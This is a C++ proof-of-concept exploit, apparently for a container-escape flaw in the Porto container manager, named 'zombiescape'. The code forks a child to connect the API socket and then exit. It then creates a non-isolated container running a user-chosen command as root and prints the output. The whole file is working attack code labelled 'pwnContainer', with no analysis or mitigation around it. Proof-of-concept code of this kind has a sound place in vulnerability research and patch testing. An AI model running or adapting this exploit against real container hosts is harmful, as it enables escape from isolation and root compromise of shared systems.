#include <sys/socket.h>
#include <util/datetime/base.h>
#include <library/cpp/getopt/last_getopt.h>
#include <security/pocs/porto/zombiescape/portoapi/libporto.hpp>


int main(int argc, char **argv) {
    NLastGetopt::TOpts opts = NLastGetopt::TOpts::Default();
    TString command = "portoctl list";
    opts.AddLongOption("command", "command to run")
            .DefaultValue(command)
            .StoreResult(&command);

    NLastGetopt::TOptsParseResult args(&opts, argc, argv);

    int fd = socket(AF_UNIX, SOCK_STREAM | SOCK_CLOEXEC, 0);
    if (fd < 0) {
        Cerr << "can't create socket" << Endl;
        return 1;
    }

    Porto::TPortoApi api{fd};
    int pid = fork();
    if (pid < 0) {
        Cerr << "can't fork" << Endl;
        return 1;
    }

    if (pid == 0) {
        auto err = api.Connect();
        if (err) {
            Cerr << "connection failed: " << api.GetLastError();
        }

        _exit(0);
    }

    sleep(1);
    TString tmp;
    auto err = api.GetProperty("self", "absolute_name", tmp);
    if (err) {
        Cerr << "can't get self container name: " << api.GetLastError() << Endl;
        return 1;
    }

    Cout << "'self' absolute_name: " << tmp << Endl;
    Cout << "try to start container with command: " << command << Endl;

    Porto::TContainerSpec pwnContainer;
    TString containerName = "self/zombiescape-" + ToString(Now().ToString());
    pwnContainer.set_name(containerName);
    pwnContainer.set_isolate(false);
    pwnContainer.set_weak(true);
    pwnContainer.set_command(command);
    pwnContainer.set_user("root");
    err = api.CreateFromSpec(pwnContainer, {}, true);
    if (err) {
        Cerr << "can't start container: " << api.GetLastError() << Endl;
        return 1;
    }

    Cout << "yay! seems work, let's wait it and check stdout" << Endl;

    err = api.WaitContainer(containerName, tmp);
    if (err) {
        Cerr << "can't wait container: " << api.GetLastError() << Endl;
        return 1;
    }

    err = api.GetProperty(containerName, "stdout", tmp);
    if (err) {
        Cerr << "can't wait container: " << api.GetLastError() << Endl;
        return 1;
    }

    Cout << "stdout: \n" << tmp << Endl;
    return 0;
}
